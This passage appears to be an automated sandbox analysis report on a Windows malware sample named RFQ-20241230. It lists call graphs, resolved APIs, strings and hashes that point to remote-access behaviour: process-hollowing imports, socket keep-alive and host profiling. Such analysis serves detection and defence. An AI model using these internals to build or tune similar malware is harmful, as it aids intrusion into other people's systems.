47451 414b80 Sleep 47449->47451 47450->47443 47451->47443 47452->47443 47453->47443 47458->47443 47459 403b40 28 API calls 47459->47462 47462->47443 47462->47459 47463 401d64 28 API calls 47462->47463 47467 41ad56 28 API calls 47462->47467 47470 41aed8 28 API calls 47462->47470 47472 405ce6 28 API calls 47462->47472 47473 40275c 28 API calls 47462->47473 47474 4027cb 28 API calls 47462->47474 47476 401e13 26 API calls 47462->47476 47477 401eea 26 API calls 47462->47477 47480 401f66 28 API calls 47462->47480 47481 41a696 79 API calls 47462->47481 47482 414b22 CreateThread 47462->47482 47886 40cbf1 6 API calls 47462->47886 47887 41adfe 28 API calls 47462->47887 47889 41acb0 GetTickCount 47462->47889 47890 41ac62 30 API calls ___scrt_fastfail 47462->47890 47891 40e679 29 API calls 47462->47891 47892 4027ec 28 API calls 47462->47892 47893 404468 59 API calls _Yarn 47462->47893 47894 4045d5 111 API calls _Yarn 47462->47894 47895 40a767 84 API calls 47462->47895 47464 4144ed GetTickCount 47463->47464 47888 41ad56 28 API calls 47464->47888 47467->47462 47470->47462 47472->47462 47473->47462 47474->47462 47476->47462 47477->47462 47480->47462 47481->47462 47482->47462 47920 419e99 102 API calls 47482->47920 47483->46841 47484->46852 47487 4085c0 47486->47487 47488 402e78 28 API calls 47487->47488 47489 4085e4 47488->47489 47489->46873 47491 4124e1 RegQueryValueExA RegCloseKey 47490->47491 47492 41250b 47490->47492 47491->47492 47492->46869 47493->46877 47494->46905 47495->46898 47496->46890 47497->46903 47499 40c8ba 47498->47499 47500 40c8da 47499->47500 47501 40c90f 47499->47501 47503 40c8d0 47499->47503 47921 41a75b 29 API calls 47500->47921 47502 41b16b GetCurrentProcess 47501->47502 47506 40c914 47502->47506 47505 40ca03 GetLongPathNameW 47503->47505 47508 403b40 28 API calls 47505->47508 47510 40c918 47506->47510 47511 40c96a 47506->47511 47507 40c8e3 47512 401e18 26 API calls 47507->47512 47509 40ca18 47508->47509 47513 403b40 28 API calls 47509->47513 47515 403b40 28 API calls 47510->47515 47514 403b40 28 API calls 47511->47514 47549 40c8ed 47512->47549 47516 40ca27 47513->47516 47518 40c978 47514->47518 47519 40c926 47515->47519 47924 40cc37 28 API calls 47516->47924 47523 403b40 28 API calls 47518->47523 47524 403b40 28 API calls 47519->47524 47520 401e13 26 API calls 47520->47503 47521 40ca3a 47925 402860 28 API calls 47521->47925 47526 40c98e 47523->47526 47527 40c93c 47524->47527 47525 40ca45 47926 402860 28 API calls 47525->47926 47923 402860 28 API calls 47526->47923 47922 402860 28 API calls 47527->47922 47531 40ca4f 47534 401e13 26 API calls 47531->47534 47532 40c999 47535 401e18 26 API calls 47532->47535 47533 40c947 47536 401e18 26 API calls 47533->47536 47537 40ca59 47534->47537 47538 40c9a4 47535->47538 47539 40c952 47536->47539 47540 401e13 26 API calls 47537->47540 47541 401e13 26 API calls 47538->47541 47542 401e13 26 API calls 47539->47542 47543 40ca62 47540->47543 47544 40c9ad 47541->47544 47545 40c95b 47542->47545 47547 401e13 26 API calls 47543->47547 47548 401e13 26 API calls 47544->47548 47546 401e13 26 API calls 47545->47546 47546->47549 47550 40ca6b 47547->47550 47548->47549 47549->47520 47551 401e13 26 API calls 47550->47551 47552 40ca74 47551->47552 47553 401e13 26 API calls 47552->47553 47554 40ca7d 47553->47554 47554->46951 47555->46962 47556->46985 47557->46944 47558->46979 47559->47013 47560->47024 47561->47046 47562->47035 47563->47069 47565 401e0c 47564->47565 47566->46896 47569 40e183 47568->47569 47570 41a66c LoadResource LockResource SizeofResource 47568->47570 47569->47185 47570->47569 47572 401f8e 47571->47572 47578 402325 47572->47578 47574 401fa4 47574->47189 47576 401f86 28 API calls 47575->47576 47577 406066 47576->47577 47577->47196 47579 40232f 47578->47579 47581 40233a 47579->47581 47582 40294a 28 API calls 47579->47582 47581->47574 47582->47581 47584 40250d 47583->47584 47586 40252b 47584->47586 47587 40261a 28 API calls 47584->47587 47586->47200 47587->47586 47588->47202 47589->47202 47590->47210 47591->47221 47592->47225 47593->47229 47594->47231 47597 402e85 47596->47597 47598 402ea9 47597->47598 47599 402e98 47597->47599 47601 402eae 47597->47601 47598->47240 47603 403445 28 API calls 47599->47603 47601->47598 47604 40225b 26 API calls 47601->47604 47603->47598 47604->47598 47606 404bd0 47605->47606 47609 40245c 47606->47609 47608 404be4 47608->47243 47610 402469 47609->47610 47612 402478 47610->47612 47613 402ad3 28 API calls 47610->47613 47612->47608 47613->47612 47614->47247 47615->47249 47617 401e94 47616->47617 47619 41a481 47618->47619 47620 41b178 GetCurrentProcess 47618->47620 47621 412513 RegOpenKeyExA 47619->47621 47620->47619 47622 412541 RegQueryValueExA RegCloseKey 47621->47622 47623 412569 47621->47623 47622->47623 47624 401f66 28 API calls 47623->47624 47625 41257e 47624->47625 47625->47264 47626->47272 47628 40b02f 47627->47628 47631 40b04b 47628->47631 47630 40b045 47630->47283 47632 40b055 47631->47632 47634 40b060 47632->47634 47635 40b138 28 API calls 47632->47635 47634->47630 47635->47634 47636->47286 47637->47289 47639 40230d 47638->47639 47640 402325 28 API calls 47639->47640 47641 401f80 47640->47641 47641->46955 47660 43a555 47642->47660 47644 43999b 47669 4392ee 38 API calls 3 library calls 47644->47669 47646 439960 47646->47644 47647 439975 47646->47647 47659 40dd54 47646->47659 47667 445364 20 API calls _abort 47647->47667 47649 43997a 47668 43a837 26 API calls _Deallocate 47649->47668 47652 4399a7 47653 4399d6 47652->47653 47670 43a59a 42 API calls __Toupper 47652->47670 47655 439a42 47653->47655 47671 43a501 26 API calls 2 library calls 47653->47671 47672 43a501 26 API calls 2 library calls 47655->47672 47657 439b09 _strftime 47657->47659 47673 445364 20 API calls _abort 47657->47673 47659->46972 47659->46973 47661 43a55a 47660->47661 47662 43a56d 47660->47662 47674 445364 20 API calls _abort 47661->47674 47662->47646 47664 43a55f 47675 43a837 26 API calls _Deallocate 47664->47675 47666 43a56a 47666->47646 47667->47649 47668->47659 47669->47652 47670->47652 47671->47655 47672->47657 47673->47659 47674->47664 47675->47666 47680 401e9b 47676->47680 47678 4027d9 47678->47328 47679->47332 47681 401ea7 47680->47681 47682 40245c 28 API calls 47681->47682 47683 401eb9 47682->47683 47683->47678 47685 409855 47684->47685 47686 4124b7 3 API calls 47685->47686 47687 40985c 47686->47687 47688 409870 47687->47688 47689 40988a 47687->47689 47691 4095cf 47688->47691 47692 409875 47688->47692 47705 4082dc 28 API calls 47689->47705 47691->47008 47703 4082dc 28 API calls 47692->47703 47693 409898 47706 4098a5 85 API calls 47693->47706 47696 409883 47704 409959 29 API calls 47696->47704 47698 409888 47698->47691 47699->47358 47710 402d8b 47700->47710 47702 4028dd 47702->47361 47703->47696 47704->47698 47707 40999f 129 API calls 47704->47707 47705->47693 47706->47691 47708 4099b5 52 API calls 47706->47708 47709 4099a9 124 API calls 47706->47709 47711 402d97 47710->47711 47714 4030f7 47711->47714 47713 402dab 47713->47702 47715 403101 47714->47715 47717 403115 47715->47717 47718 4036c2 28 API calls 47715->47718 47717->47713 47718->47717 47720 403b48 47719->47720 47726 403b7a 47720->47726 47723 403cbb 47735 403dc2 47723->47735 47725 403cc9 47725->47369 47727 403b86 47726->47727 47730 403b9e 47727->47730 47729 403b5a 47729->47723 47731 403ba8 47730->47731 47733 403bb3 47731->47733 47734 403cfd 28 API calls 47731->47734 47733->47729 47734->47733 47736 403dce 47735->47736 47739 402ffd 47736->47739 47738 403de3 47738->47725 47740 40300e 47739->47740 47745 4032a4 47740->47745 47744 40302e 47744->47738 47746 4032b0 47745->47746 47747 40301a 47745->47747 47751 4032b6 28 API calls 47746->47751 47747->47744 47750 4035e8 28 API calls 47747->47750 47750->47744 47758 4395ca 47752->47758 47756 4127ed RegSetValueExA RegCloseKey 47755->47756 47757 412814 47755->47757 47756->47757 47757->47392 47761 43954b 47758->47761 47760 401608 47760->47394 47762 43955a 47761->47762 47763 43956e 47761->47763 47769 445364 20 API calls _abort 47762->47769 47768 43956a __alldvrm 47763->47768 47771 447611 11 API calls 2 library calls 47763->47771 47765 43955f 47770 43a837 26 API calls _Deallocate 47765->47770 47768->47760 47769->47765 47770->47768 47771->47768 47775 41aac9 _Yarn ___scrt_fastfail 47772->47775 47773 401f66 28 API calls 47774 41ab3e 47773->47774 47774->47399 47775->47773 47776->47415 47778 413fb3 WSASetLastError 47777->47778 47779 413fa9 47777->47779 47778->47443 47896 413e37 35 API calls ___std_exception_copy 47779->47896 47782 413fae 47782->47778 47784 404206 socket 47783->47784 47785 4041fd 47783->47785 47787 404220 47784->47787 47788 404224 CreateEventW 47784->47788 47897 404262 WSAStartup 47785->47897 47787->47443 47788->47443 47789 404202 47789->47784 47789->47787 47791 4049b1 47790->47791 47792 40492a 47790->47792 47791->47443 47793 404933 47792->47793 47794 404987 CreateEventA CreateThread 47792->47794 47795 404942 GetLocalTime 47792->47795 47793->47794 47794->47791 47900 404b1d 47794->47900 47898 41ad56 28 API calls 47795->47898 47797 40495b 47899 404c9e 28 API calls 47797->47899 47799 404968 47800 401f66 28 API calls 47799->47800 47801 404977 47800->47801 47802 41a696 79 API calls 47801->47802 47803 40497c 47802->47803 47804 401eea 26 API calls 47803->47804 47804->47794 47806 4043e1 47805->47806 47807 4042b3 47805->47807 47808 404343 47806->47808 47809 4043e7 WSAGetLastError 47806->47809 47807->47808 47811 404cbf 28 API calls 47807->47811 47831 4042e8 47807->47831 47808->47443 47809->47808 47810 4043f7 47809->47810 47812 4043fc 47810->47812 47821 4042f7 47810->47821 47814 4042d4 47811->47814 47915 41bc86 30 API calls 47812->47915 47818 401f66 28 API calls 47814->47818 47816 4042f0 47820 404306 47816->47820 47816->47821 47817 401f66 28 API calls 47822 404448 47817->47822 47823 4042e3 47818->47823 47819 40440b 47916 404c9e 28 API calls 47819->47916 47828 404315 47820->47828 47829 40434c 47820->47829 47821->47817 47825 401f66 28 API calls 47822->47825 47826 41a696 79 API calls 47823->47826 47830 404457 47825->47830 47826->47831 47827 404418 47832 401f66 28 API calls 47827->47832 47833 401f66 28 API calls 47828->47833 47912 420f44 55 API calls 47829->47912 47834 41a696 79 API calls 47830->47834 47904 420161 27 API calls 47831->47904 47836 404427 47832->47836 47837 404324 47833->47837 47834->47808 47839 41a696 79 API calls 47836->47839 47840 401f66 28 API calls 47837->47840 47838 404354 47841 404389 47838->47841 47842 404359 47838->47842 47843 40442c 47839->47843 47844 404333 47840->47844 47914 4202fa 28 API calls 47841->47914 47846 401f66 28 API calls 47842->47846 47847 401eea 26 API calls 47843->47847 47848 41a696 79 API calls 47844->47848 47850 404368 47846->47850 47847->47808 47852 404338 47848->47852 47849 404391 47853 4043be CreateEventW CreateEventW 47849->47853 47855 401f66 28 API calls 47849->47855 47851 401f66 28 API calls 47850->47851 47854 404377 47851->47854 47905 4201a1 47852->47905 47853->47808 47856 41a696 79 API calls 47854->47856 47858 4043a7 47855->47858 47859 40437c 47856->47859 47860 401f66 28 API calls 47858->47860 47913 4205a2 53 API calls 47859->47913 47862 4043b6 47860->47862 47863 41a696 79 API calls 47862->47863 47864 4043bb 47863->47864 47864->47853 47866 404805 SetEvent CloseHandle 47865->47866 47867 40481c closesocket 47865->47867 47868 40489c 47866->47868 47869 404829 47867->47869 47868->47443 47870 404838 47869->47870 47871 40483f 47869->47871 47919 404ab1 83 API calls 47870->47919 47873 404851 WaitForSingleObject 47871->47873 47874 404892 SetEvent CloseHandle 47871->47874 47875 4201a1 3 API calls 47873->47875 47874->47868 47876 404860 SetEvent WaitForSingleObject 47875->47876 47877 4201a1 3 API calls 47876->47877 47878 404878 SetEvent CloseHandle CloseHandle 47877->47878 47878->47874 47879->47443 47880->47443 47881->47443 47882->47443 47883->47443 47884->47443 47885->47443 47886->47462 47887->47462 47888->47462 47889->47462 47890->47462 47891->47462 47892->47462 47893->47462 47894->47462 47895->47462 47896->47782 47897->47789 47898->47797 47899->47799 47903 404b29 101 API calls 47900->47903 47902 404b26 47903->47902 47904->47816 47906 41dc25 47905->47906 47907 4201a9 47905->47907 47908 41dc33 47906->47908 47917 41cd79 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47906->47917 47907->47808 47918 41d960 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 47908->47918 47911 41dc3a 47912->47838 47913->47852 47914->47849 47915->47819 47916->47827 47917->47908 47918->47911 47919->47871 47921->47507 47922->47533 47923->47532 47924->47521 47925->47525 47926->47531 47929 40e56a 47927->47929 47928 4124b7 3 API calls 47928->47929 47929->47928 47930 40e60e 47929->47930 47932 40e5fe Sleep 47929->47932 47937 40e59c 47929->47937 47963 4082dc 28 API calls 47930->47963 47932->47929 47935 41ae18 28 API calls 47935->47937 47936 40e619 47938 41ae18 28 API calls 47936->47938 47937->47932 47937->47935 47942 401e13 26 API calls 47937->47942 47946 401f66 28 API calls 47937->47946 47949 4126d2 29 API calls 47937->47949 47960 40bf04 73 API calls ___scrt_fastfail 47937->47960 47961 4082dc 28 API calls 47937->47961 47962 412774 29 API calls 47937->47962 47940 40e625 47938->47940 47964 412774 29 API calls 47940->47964 47942->47937 47943 40e638 47944 401e13 26 API calls 47943->47944 47945 40e644 47944->47945 47947 401f66 28 API calls 47945->47947 47946->47937 47948 40e655 47947->47948 47950 4126d2 29 API calls 47948->47950 47949->47937 47951 40e668 47950->47951 47965 411699 TerminateProcess WaitForSingleObject 47951->47965 47953 40e670 ExitProcess 47966 411637 60 API calls 47959->47966 47961->47937 47962->47937 47963->47936 47964->47943 47965->47953

                            Executed Functions

                            Function 0041BCF3 Relevance: 115.6, APIs: 40, Strings: 26, Instructions: 140libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(Psapi,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD08
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD11
                            • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,?,0040D783), ref: 0041BD28
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD2B
                            • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD3D
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD40
                            • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,?,0040D783), ref: 0041BD51
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD54
                            • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,?,0040D783), ref: 0041BD65
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD68
                            • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,?,0040D783), ref: 0041BD75
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD78
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D783), ref: 0041BD85
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD88
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D783), ref: 0041BD95
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BD98
                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D783), ref: 0041BDA9
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDAC
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D783), ref: 0041BDB9
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDBC
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D783), ref: 0041BDCD
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDD0
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D783), ref: 0041BDE1
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDE4
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D783), ref: 0041BDF5
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BDF8
                            • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,?,0040D783), ref: 0041BE05
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE08
                            • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,?,0040D783), ref: 0041BE16
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE19
                            • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,?,0040D783), ref: 0041BE26
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE29
                            • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,?,0040D783), ref: 0041BE3B
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE3E
                            • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,?,0040D783), ref: 0041BE4B
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE4E
                            • LoadLibraryA.KERNELBASE(Iphlpapi,GetExtendedTcpTable,?,?,?,?,0040D783), ref: 0041BE60
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE63
                            • LoadLibraryA.KERNEL32(Iphlpapi,GetExtendedUdpTable,?,?,?,?,0040D783), ref: 0041BE70
                            • GetProcAddress.KERNEL32(00000000), ref: 0041BE73
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleLibraryLoadModule
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetExtendedTcpTable$GetExtendedUdpTable$GetMonitorInfoW$GetProcessImageFileNameW$GetSystemTimes$GlobalMemoryStatusEx$Iphlpapi$IsUserAnAdmin$IsWow64Process$Kernel32$NtResumeProcess$NtSuspendProcess$NtUnmapViewOfSection$Psapi$SetProcessDEPPolicy$SetProcessDpiAwareness$Shell32$Shlwapi$kernel32$ntdll$shcore$user32
                            • API String ID: 384173800-625181639
                            • Opcode ID: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                            • Instruction ID: 9dbe04c74af77a7e1246f7e7b4568b240d3cb110e698a9ec5713b860520f9e80
                            • Opcode Fuzzy Hash: 0789f4e3f810de028ed60e0db8f6a6efc83e65cfda48e5b03c752fe52fb7e632
                            • Instruction Fuzzy Hash: EC31EEA0E4031C7ADA107FB69C49E5B7E9CD940B953110827B508D3162FB7DA980DEEE
                            Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                              • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                              • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                            • Sleep.KERNELBASE(00000BB8), ref: 0040E603
                            • ExitProcess.KERNEL32 ref: 0040E672
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseExitOpenProcessQuerySleepValue
                            • String ID: 5.3.0 Pro$override$pth_unenc$BG
                            • API String ID: 2281282204-3981147832
                            • Opcode ID: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                            • Instruction ID: 5cf4e9032f47a3efac01ff8ef37086889acd92013af90c8396a8a4e29292548f
                            • Opcode Fuzzy Hash: 099a9bf13a86a18ae7ced4af45115ec220a16a2a1b66786f925988895ab02a01
                            • Instruction Fuzzy Hash: 7B21A131B0031027C608767A891BA6F359A9B91719F90443EF805A72D7EE7D8A6083DF
                            Function 00404915 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60timethreadCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1179 404915-404924 1180 4049b1 1179->1180 1181 40492a-404931 1179->1181 1182 4049b3-4049b7 1180->1182 1183 404933-404937 1181->1183 1184 404939-404940 1181->1184 1185 404987-4049af CreateEventA CreateThread 1183->1185 1184->1185 1186 404942-404982 GetLocalTime call 41ad56 call 404c9e call 401f66 call 41a696 call 401eea 1184->1186 1185->1182 1186->1185
                            APIs
                            • GetLocalTime.KERNEL32(?), ref: 00404946
                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00404994
                            • CreateThread.KERNELBASE(00000000,00000000,Function_00004B1D,?,00000000,00000000), ref: 004049A7
                            Strings
                            • KeepAlive | Enabled | Timeout: , xrefs: 0040495C
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Create$EventLocalThreadTime
                            • String ID: KeepAlive | Enabled | Timeout:
                            • API String ID: 2532271599-1507639952
                            • Opcode ID: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                            • Instruction ID: b3b3bd05b27f7402d17ec3e4b95caf04d044377deb2a76ff13a13b362c137b93
                            • Opcode Fuzzy Hash: d248886e52a7d0ac6cae50da1f59772ac17be00107f66e41d9b0c0522851940d
                            • Instruction Fuzzy Hash: C2113AB19042543AC710A7BA8C09BCB7FAC9F86364F04407BF50462192D7789845CBFA
                            Function 0043294A Relevance: 4.5, APIs: 3, Instructions: 30encryptionCOMMON
                            Download Yara Rule
                            APIs
                            • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000001,004326D2,00000024,?,?,?), ref: 0043295C
                            • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,?,?,?,0042CBCE,?), ref: 00432972
                            • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?,?,?,0042CBCE,?), ref: 00432984
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Crypt$Context$AcquireRandomRelease
                            • String ID:
                            • API String ID: 1815803762-0
                            • Opcode ID: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                            • Instruction ID: 265e42ecfadf18463eab4f7c57cd3d944434f2f899047e0b797dffc1cacfdca9
                            • Opcode Fuzzy Hash: 04772303a0a25dfd0b8e93efaf4bd4cd6a07a437a7117abaa9b2762516ca9460
                            • Instruction Fuzzy Hash: 06E06531318311BBEB310E21BC08F577AE4AF89B72F650A3AF251E40E4D2A288019A1C
                            Function 0041A7B2 Relevance: 3.0, APIs: 2, Instructions: 40COMMON
                            Download Yara Rule
                            APIs
                            • GetComputerNameExW.KERNELBASE(00000001,?,0000002B,00474358), ref: 0041A7CF
                            • GetUserNameW.ADVAPI32(?,0040DFC3), ref: 0041A7E7
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: Name$ComputerUser
                            • String ID:
                            • API String ID: 4229901323-0
                            • Opcode ID: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                            • Instruction ID: 0a408ea7b536296bc4698588bf682dce528bd2697060893402f21fe22c13e40a
                            • Opcode Fuzzy Hash: f3e21b17a5d8a19e2687fa05b240d0301e1fcdfe38c042d63901ddde5ca2efef
                            • Instruction Fuzzy Hash: 8801FF7290011CAADB14EB90DC45ADDBBBCEF44715F10017AB501B21D5EFB4AB898A98
                            Function 00426107 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.3799223994.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_RFQ-20241230.jbxd
                            Yara matches
                            Similarity
                            • API ID: recv
                            • String ID:
                            • API String ID: 1507349165-0
                            • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                            • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                            • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                            • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                            Function 0040D767 Relevance: 95.3, APIs: 13, Strings: 41, Instructions: 799COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 5 40d767-40d7e9 call 41bcf3 GetModuleFileNameW call 40e168 call 401fbd * 2 call 41afd3 call 40e8bd call 401d8c call 43e830 22 40d835-40d8fd call 401d64 call 401e8f call 401d64 call 404cbf call 405ce6 call 401eef call 401eea * 2 call 401d64 call 401ebd call 40541d call 401d64 call 404bb1 call 401d64 call 404bb1 5->22 23 40d7eb-40d830 call 40e986 call 401d64 call 401e8f call 40fcba call 40e937 call 40e155 5->23 69 40d950-40d96b call 401d64 call 40b125 22->69 70 40d8ff-40d94a call 4085b4 call 401eef call 401eea call 401e8f call 4124b7 22->70 49 40dc96-40dca7 call 401eea 23->49 80 40d9a5-40d9ac call 40bed7 69->80 81 40d96d-40d98c call 401e8f call 4124b7 69->81 70->69 101 40e134-40e154 call 401e8f call 412902 call 4112b5 70->101 89 40d9b5-40d9bc 80->89 90 40d9ae-40d9b0 80->90 81->80 97 40d98e-40d9a4 call 401e8f call 412902 81->97 94 40d9c0-40d9cc call 41a473 89->94 95 40d9be 89->95 93 40dc95 90->93 93->49 105 40d9d5-40d9d9 94->105 106 40d9ce-40d9d0 94->106 95->94 97->80 108 40da18-40da2b call 401d64 call 401e8f 105->108 109 40d9db call 40697b 105->109 106->105 127 40da32-40daba call 401d64 call 41ae18 call 401e18 call 401e13 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f 108->127 128 40da2d call 4069ba 108->128 117 40d9e0-40d9e2 109->117 120 40d9e4-40d9e9 call 40699d call 4064d0 117->120 121 40d9ee-40da01 call 401d64 call 401e8f 117->121 120->121 121->108 138 40da03-40da09 121->138 163 40db22-40db26 127->163 164 40dabc-40dad5 call 401d64 call 401e8f call 43a621 127->164 128->127 138->108 139 40da0b-40da11 138->139 139->108 141 40da13 call 4064d0 139->141 141->108 166 40dcaa-40dd01 call 436060 call 4022f8 call 401e8f * 2 call 41265d call 4082d7 163->166 167 40db2c-40db33 163->167 164->163 191 40dad7-40db1d call 401d64 call 401e8f call 401d64 call 401e8f call 40c89e call 401e18 call 401e13 164->191 222 40dd06-40dd5c call 401d64 call 401e8f call 401f66 call 401e8f call 4126d2 call 401d64 call 401e8f call 43a5f7 166->222 169 40dbb1-40dbbb call 4082d7 167->169 170 40db35-40dbaf call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 40bc67 167->170 177 40dbc0-40dbe4 call 4022f8 call 4338d8 169->177 170->177 198 40dbf3 177->198 199 40dbe6-40dbf1 call 436060 177->199 191->163 204 40dbf5-40dc40 call 401e07 call 43e359 call 4022f8 call 401e8f call 4022f8 call 401e8f call 4128a2 198->204 199->204 259 40dc45-40dc6a call 4338e1 call 401d64 call 40b125 204->259 273 40dd79-40dd7b 222->273 274 40dd5e 222->274 259->222 272 40dc70-40dc91 call 401d64 call 41ae18 call 40e219 259->272 272->222 292 40dc93 272->292 275 40dd81 273->275 276 40dd7d-40dd7f 273->276 278 40dd60-40dd77 call 41bec0 CreateThread 274->278 279 40dd87-40de66 call 401f66 * 2 call 41a696 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f call 401d64 call 401e8f StrToIntA call 409517 call 401d64 call 401e8f 275->279 276->278 278->279 330 40dea1 279->330 331 40de68-40de9f call 43361d call 401d64 call 401e8f CreateThread 279->331 292->93 332 40dea3-40debb call 401d64 call 401e8f 330->332 331->332 343 40def9-40df0c call 401d64 call 401e8f 332->343 344 40debd-40def4 call 43361d call 401d64 call 401e8f CreateThread 332->344 354 40df6c-40df7f call 401d64 call 401e8f 343->354 355 40df0e-40df67 call 401d64 call 401e8f call 401d64 call 401e8f call 40c854 call 401e18 call 401e13 CreateThread 343->355 344->343 365 40df81-40dfb5 call 401d64 call 401e8f call 401d64 call 401e8f call 43a5f7 call 40b95c 354->365 366 40dfba-40dfde call 41a7b2 call 401e18 call 401e13 354->366 355->354 365->366 388 40dfe0-40dfe1 SetProcessDEPPolicy 366->388 389 40dfe3-40dff6 CreateThread 366->389 388->389 390 40e004-40e00b 389->390 391 40dff8-40e002 CreateThread 389->391 394 40e019-40e020 390->394 395 